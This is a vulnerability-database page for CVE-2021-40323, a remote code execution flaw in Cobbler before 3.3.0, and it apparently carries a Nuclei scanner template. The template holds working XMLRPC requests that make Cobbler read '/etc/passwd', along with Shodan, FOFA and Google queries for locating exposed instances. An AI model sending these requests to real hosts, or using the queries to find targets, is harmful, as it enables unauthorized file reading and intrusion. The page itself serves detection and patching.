Vulners
Lucene search
Cobbler <3.3.0 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
 | CVE-2021-40323 | 30 Mar 202404:41 | – | circl |
 | Cobbler 代码注入漏洞 | 4 Oct 202100:00 | – | cnnvd |
 | Cobbler Remote Code Execution Vulnerability | 8 Oct 202100:00 | – | cnvd |
 | CVE-2021-40323 | 4 Oct 202105:37 | – | cve |
 | CVE-2021-40323 | 4 Oct 202105:37 | – | cvelist |
 | [SECURITY] Fedora 35 Update: cobbler-3.2.2-2.fc35 | 29 Sep 202100:21 | – | fedora |
| [SECURITY] Fedora 34 Update: cobbler-3.2.2-2.fc34 | 2 Oct 202101:28 | – | fedora |
| [SECURITY] Fedora 33 Update: cobbler-3.2.2-2.fc33 | 2 Oct 202101:10 | – | fedora |
 | Cobbler before 3.3.0 allows log poisoning | 5 Oct 202117:53 | – | github |
 | Cobbler before 3.3.0 allows log poisoning | 5 Oct 202100:00 | – | gitlab |
10
id: CVE-2021-40323
info:
name: Cobbler <3.3.0 - Remote Code Execution
author: c-sh0
severity: critical
description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system.
remediation: |
Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability.
reference:
- https://github.com/cobbler/cobbler/releases/tag/v3.3.0
- https://github.com/cobbler/cobbler/issues/2795
- https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40323
- https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40323
cwe-id: CWE-94
epss-score: 0.88482
epss-percentile: 0.99751
cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: cobbler_project
product: cobbler
shodan-query: http.title:"cobbler web interface"
fofa-query: title="cobbler web interface"
google-query: intitle:"cobbler web interface"
tags: cve,cve2021,cobbler,rce,cobbler_project,vuln
http:
- raw:
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>find_profile</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>name</name>
<value>
<string>*</string>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>generate_script</methodName>
<params>
<param>
<value>
<string>{{profile}}</string>
</value>
</param>
<param>
<value>
<string></string>
</value>
</param>
<param>
<value>
<string>/etc/passwd</string>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'text/xml'
- type: regex
regex:
- "root:.*:0"
- "bin:.*:1"
- "nobody:.*:99"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
name: profile
group: 1
regex:
- '<value><string>(.*?)</string></value>'
internal: true
# digest: 4a0a00473045022100c3d4125ca6899b07530d41089a84b903fd85767420975760e83c7d0bb56f64790220557bf6d4ca5730a33989ca883c2deca6d4ab00857f61d521348c148daff8befe:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 27.5
CVSS 3.19.8
EPSS0.88482